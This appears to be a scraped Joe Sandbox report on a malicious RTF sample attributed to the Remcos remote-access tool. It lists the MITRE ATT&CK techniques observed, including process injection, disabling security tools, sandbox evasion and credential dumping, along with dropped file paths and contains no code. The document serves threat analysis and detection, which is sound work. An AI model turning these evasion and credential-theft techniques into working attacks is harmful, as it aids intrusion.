Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report WC5Gv13cOQ.rtf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\json[1].json

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{40B684B2-6E04-4D52-883C-BB9A6B4BB620}.tmp

Windows Analysis Report
WC5Gv13cOQ.rtf

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre